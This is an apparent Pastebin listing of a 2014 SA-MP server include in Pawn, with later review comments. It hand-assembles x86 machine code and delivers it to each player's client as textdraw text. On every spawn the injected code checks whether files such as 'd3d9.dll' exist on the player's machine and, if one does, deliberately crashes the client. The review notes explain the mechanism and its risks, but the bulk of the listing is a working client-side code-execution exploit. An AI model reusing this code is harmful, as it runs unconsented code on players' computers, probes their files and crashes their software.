
Snoowker

a guest
Feb 12th, 2014
  1. #if !defined TextDrawClient_included
  2. #define TextDrawClient_included
  3.  
  4. #include <a_samp>
  5.  
  // Per-player handle of the textdraw that carries the byte buffer (set in LoadClientForPlayer).
  6. static PlayerText:Clients[MAX_PLAYERS];
  // Per-player counter kept in 1..255; advanced on every PrepareClientMetaCode call and embedded in the stub.
  7. static ClientCommandId[MAX_PLAYERS];
  // ONE buffer shared by all players and rebuilt on every call; it is not static, so it is visible to the including script.
  // NOTE(review): indices 800..803 are written unconditionally, so MAX_PLAYERS*3 must exceed 803; nothing checks this.
  8. new ClientCode[MAX_PLAYERS*3];
  9.  
  // Index in ClientCode where the per-command payload starts (the fixed stub occupies 0..0x3A).
  10. #define CLIENT_CODE_OFFSET  0x3B
  // Index in ClientCode where string data for the payload is stored.
  11. #define CLIENT_DATA_OFFSET  0x1AD
  // NOTE(review): the two SIZE constants are not referenced anywhere in this listing, so no bound is enforced.
  12. #define CLIENT_CODE_SIZE    0x172
  13. #define CLIENT_DATA_SIZE    0x173
  14.  
  15.  
  // Appends one cell to ClientCode at index `off` and advances `off`; a variable named `off` must be in scope.
  16. #define _db(%0) ClientCode[off++] = %0
  17.  
  // Rebuilds the shared ClientCode buffer with the fixed stub for one player.
  //
  // Fills the whole buffer with 0x90, advances the player's command id (1..255, never 0),
  // writes the stub's bytes at indices 0..0x3A, a placeholder `ret` at index 0x3B
  // (CLIENT_CODE_OFFSET) and four bytes at indices 800..803.
  //
  // Security review: the bytes are x86 instructions (see the per-line mnemonics) and this
  // include later passes the buffer to the client as textdraw text, i.e. the server is trying
  // to make the player's client execute server-supplied code. The absolute addresses below are
  // hard-coded, so the stub presumably matches only one client build; on any other build the
  // effect is unpredictable. A string shaped like this (long 0x90 runs, no printable text) is a
  // usable detection signal for a client-side or network filter.
  18. static stock PrepareClientMetaCode(playerid)
  19. {
  20.     for (new i = 0; i < sizeof(ClientCode); i++)
  21.         ClientCode[i] = 0x90;
  22.  
  23.     ClientCommandId[playerid] = (ClientCommandId[playerid] + 1)&0xFF;
  24.  
          // 0 is skipped; presumably because a zero cell would end the string (the id is emitted as a byte below).
  25.     if (ClientCommandId[playerid] == 0)
  26.         ClientCommandId[playerid] = 1;
  27.  
  28.     new off = 0;
  29.  
  30.     _db(0x55); //push ebp
  31.  
  32.     _db(0x8B); //mov ebp,esp
  33.     _db(0xEC);
  34.  
  35.     _db(0x50); //push eax
  36.     _db(0x51); //push ecx
  37.     _db(0x53); //push ebx
  38.  
          // Immediate is padded with 0xFF and shifted right by 8, giving the absolute address 0x408331;
          // presumably done so that no zero byte appears in the string.
  39.     _db(0xB8); //mov eax,408331FF
  40.     _db(0xFF);
  41.     _db(0x31);
  42.     _db(0x83);
  43.     _db(0x40);
  44.  
  45.     _db(0xC1); //shr eax,08
  46.     _db(0xE8);
  47.     _db(0x08);
  48.  
  49.     _db(0x8A); //mov cl,[eax]
  50.     _db(0x08);
  51.  
  52.     _db(0xB3); //mov bl,ClientCommandId[playerid]
  53.     _db(ClientCommandId[playerid]);
  54.  
          // Per the mnemonics: the byte stored at that address is compared with this command id and the
          // payload call is skipped when they already match, so a prepared command runs once (inferred).
  55.     _db(0x38); //cmp cl,bl
  56.     _db(0xD9);
  57.  
          // NOTE(review): the comment says +0x1A but the displacement byte emitted is 0x18.
  58.     _db(0x74); //je +0x1A
  59.     _db(0x18);
  60.  
  61.     _db(0x88); //mov [eax],bl
  62.     _db(0x18);
  63.  
  64.     _db(0x8B); //mov eax,[ebp+04]
  65.     _db(0x45);
  66.     _db(0x04);
  67.  
          // 0x3BFFFFFF >> 0x18 = 0x3B, the same value as CLIENT_CODE_OFFSET (hard-coded here, not derived from the macro).
  68.     _db(0xBB); //mov ebx,0x3BFFFFFF
  69.     _db(0xFF);
  70.     _db(0xFF);
  71.     _db(0xFF);
  72.     _db(0x3B);
  73.  
  74.     _db(0xC1); //shr ebx,18
  75.     _db(0xEB);
  76.     _db(0x18);
  77.  
  78.     _db(0x01); //add eax,ebx
  79.     _db(0xD8);
  80.  
  81.     _db(0x8B); //mov ecx,[ebp+04]
  82.     _db(0x4D);
  83.     _db(0x04);
  84.  
  85.     _db(0x51); //push ecx
  86.  
          // Calls [ebp+04] + 0x3B with [ebp+04] as its argument; presumably [ebp+04] is the buffer's own address in the client.
  87.     _db(0xFF); //call eax
  88.     _db(0xD0);
  89.  
  90.     _db(0x83); //add esp,04
  91.     _db(0xC4);
  92.     _db(0x04);
  93.  
  94.     _db(0x5B); //pop ebx
  95.     _db(0x59); //pop ecx
  96.     _db(0x58); //pop eax
  97.     _db(0x5D); //pop ebp
  98.  
          // NOTE(review): the fixed stack adjustments below assume a particular caller frame in the client; confirm before relying on this description.
  99.     _db(0x83); //add esp,24
  100.     _db(0xC4);
  101.     _db(0x24);
  102.  
  103.     _db(0x5F); //pop edi
  104.     _db(0x5E); //pop esi
  105.  
  106.     _db(0x83); //add esp,18
  107.     _db(0xC4);
  108.     _db(0x18);
  109.  
  110.     _db(0xC3); //ret
  111.  
           // The stub above is 0x3B bytes long, so this byte lands at index 0x3B (CLIENT_CODE_OFFSET);
           // callers that emit a payload overwrite it.
  112.     //Code
  113.     _db(0xC3); //ret (do nothing)
  114.  
           // Four bytes 16 27 40 00, i.e. 0x00402716 in little-endian order, labelled as a return address by the author.
           // The 0x00 at index 803 is the only zero cell written here, so it also ends the string.
  115.     //Return address
  116.     ClientCode[800] = 0x16; //-> ret
  117.     ClientCode[801] = 0x27;
  118.     ClientCode[802] = 0x40;
  119.     ClientCode[803] = 0x00;
  120. }
  121.  
  // Emits, starting at ClientCode[off], a client-side routine that reports whether a file exists.
  //
  // `off` is a by-value parameter, so the caller's own write position is not advanced.
  // Per the author's note the emitted routine takes arg0 = file path pointer and arg1 = path length.
  // Per the mnemonics it stores a zero byte at path+length, pushes seven arguments, calls the
  // absolute address 0x81E45A and returns al = 1 when the result is not -1.
  //
  // Security review: this gives the server a way to probe which files are present on the player's
  // machine. NOTE(review): the pushed values (0, 0x80, 3, 0, 1, 0x80000000, path) match the argument
  // order of Win32 CreateFileA opening an existing file read-only; if that is what the address
  // resolves to, the returned handle is never closed. Confirm before relying on this.
  122. static stock Client_FileExists(off) //arg0 - file path, arg1 - length
  123. {
  124.     _db(0x55); //push ebp
  125.  
  126.     _db(0x8B); //mov ebp,esp
  127.     _db(0xEC);
  128.  
  129.     _db(0x53); //push ebx
  130.  
  131.     _db(0x31); //xor eax,eax
  132.     _db(0xC0);
  133.  
  134.     _db(0x50); //push eax
  135.  
           // Small constants are built as 0xNNFFFFFF shifted right by 0x18; presumably to keep zero bytes out of the string.
  136.     _db(0xB8); //mov eax,80FFFFFF
  137.     _db(0xFF);
  138.     _db(0xFF);
  139.     _db(0xFF);
  140.     _db(0x80);
  141.  
  142.     _db(0xC1); //shr eax,18
  143.     _db(0xE8);
  144.     _db(0x18);
  145.  
  146.     _db(0x50); //push eax
  147.  
  148.     _db(0xB8); //mov eax,03FFFFFF
  149.     _db(0xFF);
  150.     _db(0xFF);
  151.     _db(0xFF);
  152.     _db(0x03);
  153.  
  154.     _db(0xC1); //shr eax,18
  155.     _db(0xE8);
  156.     _db(0x18);
  157.  
  158.     _db(0x50); //push eax
  159.  
  160.     _db(0x31); //xor eax,eax
  161.     _db(0xC0);
  162.  
  163.     _db(0x50); //push eax
  164.     _db(0x40); //inc eax
  165.     _db(0x50); //push eax
  166.  
           // 0xFFFFFF80 << 0x18 = 0x80000000.
  167.     _db(0xB8); //mov eax,FFFFFF80
  168.     _db(0x80);
  169.     _db(0xFF);
  170.     _db(0xFF);
  171.     _db(0xFF);
  172.  
  173.     _db(0xC1); //shl eax,18
  174.     _db(0xE0);
  175.     _db(0x18);
  176.  
  177.     _db(0x50); //push eax
  178.  
  179.     _db(0x8B); //mov eax,[ebp+08]
  180.     _db(0x45);
  181.     _db(0x08);
  182.  
  183.     _db(0x8B); //mov ebx,[ebp+0C]
  184.     _db(0x5D);
  185.     _db(0x0C);
  186.  
  187.     _db(0x01); //add eax,ebx
  188.     _db(0xD8);
  189.  
  190.     _db(0x53); //push ebx
  191.  
  192.     _db(0x31); //xor ebx,ebx
  193.     _db(0xDB);
  194.  
           // Bytes 88 18 store bl (zero here) at [eax] = path+length, i.e. the path is terminated at run time.
  195.     _db(0x88); //mov [eax],bl
  196.     _db(0x18);
  197.  
  198.     _db(0x5B); //pop ebx
  199.  
  200.     _db(0x29); //sub eax,ebx
  201.     _db(0xD8);
  202.  
  203.     _db(0x50); //push eax
  204.  
           // 0x81E45AFF >> 8 = 0x81E45A, a hard-coded absolute address; presumably valid for one client build only.
  205.     _db(0xB8); //mov eax,81E45AFF
  206.     _db(0xFF);
  207.     _db(0x5A);
  208.     _db(0xE4);
  209.     _db(0x81);
  210.  
  211.     _db(0xC1); //shr eax,08
  212.     _db(0xE8);
  213.     _db(0x08);
  214.  
  215.     _db(0xFF); //call eax
  216.     _db(0xD0);
  217.  
  218.     _db(0x83); //cmp eax,-01
  219.     _db(0xF8);
  220.     _db(0xFF);
  221.  
  222.     _db(0x0F); //setne al
  223.     _db(0x95);
  224.     _db(0xC0);
  225.  
  226.     _db(0x5B); //pop ebx
  227.     _db(0x5D); //pop ebp
  228.     _db(0xC3); //ret
  229. }
  230.  
  // Builds and sends a payload that makes the player's client crash if either of two files exists.
  //
  // Steps visible here: rebuild the stub (PrepareClientMetaCode), copy two file-name strings into
  // the data area at CLIENT_DATA_OFFSET, emit a payload at CLIENT_CODE_OFFSET that calls the
  // file-exists routine (emitted at index 0xB0) once per name, and push the buffer to the client
  // with PlayerTextDrawSetString. When the routine returns non-zero the payload takes a `jne` whose
  // 32-bit displacement is four random non-zero bytes; the author labels that branch "crash".
  //
  // Security review: this is server-to-client code execution used as an anti-cheat, and it also
  // reveals client file presence to server-supplied code. A file named d3d9.dll can be present for
  // reasons other than cheating, so the check is a heuristic and a match crashes the client with no
  // explanation. Players have no way to consent to or inspect this; the defence is on the client side.
  231. stock CrashCheater(playerid)
  232. {
  233.  
  234.     PrepareClientMetaCode(playerid);
  235.  
  236.     new str_d3d9[] = "d3d9.dll";
           // NOTE(review): the variable name and a later comment say "vorbisHooked.dll", but the literal checked is this one.
  237.     new str_vorbisHooked[] = "sdfsdfdssdfl";
  238.  
  239.     new bytes = 0;
  240.     new i = 0;
  241.     while (str_d3d9[bytes])
  242.     {
  243.         ClientCode[CLIENT_DATA_OFFSET + bytes] = str_d3d9[bytes];
  244.         bytes++;
  245.     }
           // Leaves a one-cell gap (still 0x90) after the first name; the routine emitted by
           // Client_FileExists stores a zero byte at path+length at run time (bytes 0x88 0x18).
  246.     bytes++;
  247.     while (str_vorbisHooked[i])
  248.     {
  249.         ClientCode[CLIENT_DATA_OFFSET + bytes] = str_vorbisHooked[i];
  250.         bytes++;
  251.         i++;
  252.     }
  253.  
  254.  
           // Payload starts where the stub's placeholder `ret` was written.
  255.     new off = CLIENT_CODE_OFFSET;
  256.  
  257.     _db(0x55); //push ebp
  258.  
  259.     _db(0x8B); //mov ebp,esp
  260.     _db(0xEC);
  261.  
  262.     _db(0x50); //push eax
  263.     _db(0x53); //push ebx
  264.  
           // Length of the first name (sizeof - 1 = 8), built in the top byte and shifted down by 0x18.
  265.     _db(0xB8); //mov eax,length
  266.     _db(0xFF);
  267.     _db(0xFF);
  268.     _db(0xFF);
  269.     _db((sizeof(str_d3d9) - 1));
  270.  
  271.     _db(0xC1); //shr eax,18
  272.     _db(0xE8);
  273.     _db(0x18);
  274.  
  275.     _db(0x50); //push eax
  276.  
           // [ebp+08] is the argument the stub pushed before calling the payload; presumably the buffer's address.
  277.     _db(0x8B); //mov eax,[ebp+08]
  278.     _db(0x45);
  279.     _db(0x08);
  280.  
           // CLIENT_DATA_OFFSET is placed in the upper 16 bits and shifted down by 0x10, then added to that base.
  281.     _db(0xBB); //mov ebx,"d3d9.dll"
  282.     _db(0xFF);
  283.     _db(0xFF);
  284.     _db((CLIENT_DATA_OFFSET&0xFF));
  285.     _db(((CLIENT_DATA_OFFSET>>>8)&0xFF));
  286.  
  287.     _db(0xC1); //shr ebx,10
  288.     _db(0xEB);
  289.     _db(0x10);
  290.  
  291.     _db(0x01); //add eax,ebx
  292.     _db(0xD8);
  293.  
  294.     _db(0x50); //push eax
  295.  
  296.     _db(0x8B); //mov eax,[ebp+08]
  297.     _db(0x45);
  298.     _db(0x08);
  299.  
           // 0xB0 must equal the offset passed to Client_FileExists at the end of this function.
  300.     _db(0xBB); //mov ebx,Client_FileExists
  301.     _db(0xFF);
  302.     _db(0xFF);
  303.     _db(0xFF);
  304.     _db(0xB0);
  305.  
  306.     _db(0xC1); //shr ebx,18
  307.     _db(0xEB);
  308.     _db(0x18);
  309.  
  310.     _db(0x01); //add eax,ebx
  311.     _db(0xD8);
  312.  
  313.     _db(0xFF); //call eax
  314.     _db(0xD0);
  315.  
  316.     _db(0x84); //test al,al
  317.     _db(0xC0);
  318.  
           // Displacement is four random bytes in 1..255 each, so a taken branch lands at an unpredictable address.
  319.     _db(0x0F); //jne crash
  320.     _db(0x85);
  321.     _db((random(0xFF) + 1));
  322.     _db((random(0xFF) + 1));
  323.     _db((random(0xFF) + 1));
  324.     _db((random(0xFF) + 1));
  325.  
  326.     _db(0x83); //add esp,08
  327.     _db(0xC4);
  328.     _db(0x08);
  329.  
           // Same sequence again for the second name.
  330.     _db(0xB8); //mov eax,length
  331.     _db(0xFF);
  332.     _db(0xFF);
  333.     _db(0xFF);
  334.     _db((sizeof(str_vorbisHooked) - 1));
  335.  
  336.     _db(0xC1); //shr eax,18
  337.     _db(0xE8);
  338.     _db(0x18);
  339.  
  340.     _db(0x50); //push eax
  341.  
  342.     _db(0x8B); //mov eax,[ebp+08]
  343.     _db(0x45);
  344.     _db(0x08);
  345.  
           // Offset of the second name: CLIENT_DATA_OFFSET + sizeof(str_d3d9), which matches the copy loops above (8 chars + 1 gap).
  346.     _db(0xBB); //mov ebx,"vorbisHooked.dll"
  347.     _db(0xFF);
  348.     _db(0xFF);
  349.     _db(((CLIENT_DATA_OFFSET + sizeof(str_d3d9))&0xFF));
  350.     _db((((CLIENT_DATA_OFFSET + sizeof(str_d3d9))>>>8)&0xFF));
  351.  
  352.     _db(0xC1); //shr ebx,10
  353.     _db(0xEB);
  354.     _db(0x10);
  355.  
  356.     _db(0x01); //add eax,ebx
  357.     _db(0xD8);
  358.  
  359.     _db(0x50); //push eax
  360.  
  361.     _db(0x8B); //mov eax,[ebp+08]
  362.     _db(0x45);
  363.     _db(0x08);
  364.  
  365.     _db(0xBB); //mov ebx,Client_FileExists
  366.     _db(0xFF);
  367.     _db(0xFF);
  368.     _db(0xFF);
  369.     _db(0xB0);
  370.  
  371.     _db(0xC1); //shr ebx,18
  372.     _db(0xEB);
  373.     _db(0x18);
  374.  
  375.     _db(0x01); //add eax,ebx
  376.     _db(0xD8);
  377.  
  378.     _db(0xFF); //call eax
  379.     _db(0xD0);
  380.  
  381.     _db(0x84); //test al,al
  382.     _db(0xC0);
  383.  
  384.     _db(0x0F); //jne crash
  385.     _db(0x85);
  386.     _db((random(0xFF) + 1));
  387.     _db((random(0xFF) + 1));
  388.     _db((random(0xFF) + 1));
  389.     _db((random(0xFF) + 1));
  390.  
  391.     _db(0x83); //add esp,08
  392.     _db(0xC4);
  393.     _db(0x08);
  394.  
  395.     _db(0x5B); //pop ebx
  396.     _db(0x58); //pop eax
  397.     _db(0x5D); //pop ebp
  398.     _db(0xC3); //ret
  399.  
           // Emits the file-exists routine at index 0xB0; the cells between the payload's end and 0xB0 keep their 0x90 fill.
  400.     Client_FileExists(0xB0);
  401.  
           // Delivery point: the finished buffer is sent to the client as this player's textdraw string.
  402.     PlayerTextDrawSetString(playerid, Clients[playerid], ClientCode);
  403. }
  404.  
  // Rebuilds the stub for this player, creates a player textdraw at (1000, 1000) whose text is the
  // ClientCode buffer, stores its handle in Clients[playerid] and shows it.
  // NOTE(review): OnPlayerSpawn calls this on every spawn and the previous handle is overwritten
  // without PlayerTextDrawDestroy, so earlier textdraws are never released in this listing.
  405. stock LoadClientForPlayer(playerid)
  406. {
  407.     PrepareClientMetaCode(playerid);
           // This call is the first point at which the byte buffer leaves the server.
  408.     Clients[playerid] = CreatePlayerTextDraw(playerid, 1000, 1000, ClientCode);
  409.     PlayerTextDrawShow(playerid, Clients[playerid]);
  410. }
  411.  
  // Hides and destroys the player's textdraw, then resets the stored handle to PlayerText:0.
  // NOTE(review): nothing in this listing calls this function.
  // NOTE(review): 0 can be a valid player-textdraw id in SA-MP; INVALID_TEXT_DRAW is the usual sentinel. Verify.
  412. stock UnloadClientForPlayer(playerid)
  413. {
  414.     PlayerTextDrawHide(playerid, Clients[playerid]);
  415.     PlayerTextDrawDestroy(playerid, Clients[playerid]);
  416.     Clients[playerid] = PlayerText:0;
  417. }
  418.  
  419. #undef _db
  420. #endif
  421.  
  // Spawn callback: for every player, on every spawn, creates the textdraw and then sends the
  // file-check payload. Returns 1.
  // NOTE(review): this definition sits after the #endif, outside the include guard, so including
  // the file twice would define the callback twice.
  // NOTE(review): the check runs for all players with no allow-list or logging visible here.
  422. public OnPlayerSpawn(playerid)
  423. {
  424.     LoadClientForPlayer(playerid);
  425.     CrashCheater(playerid);
  426.     return 1;
  427. }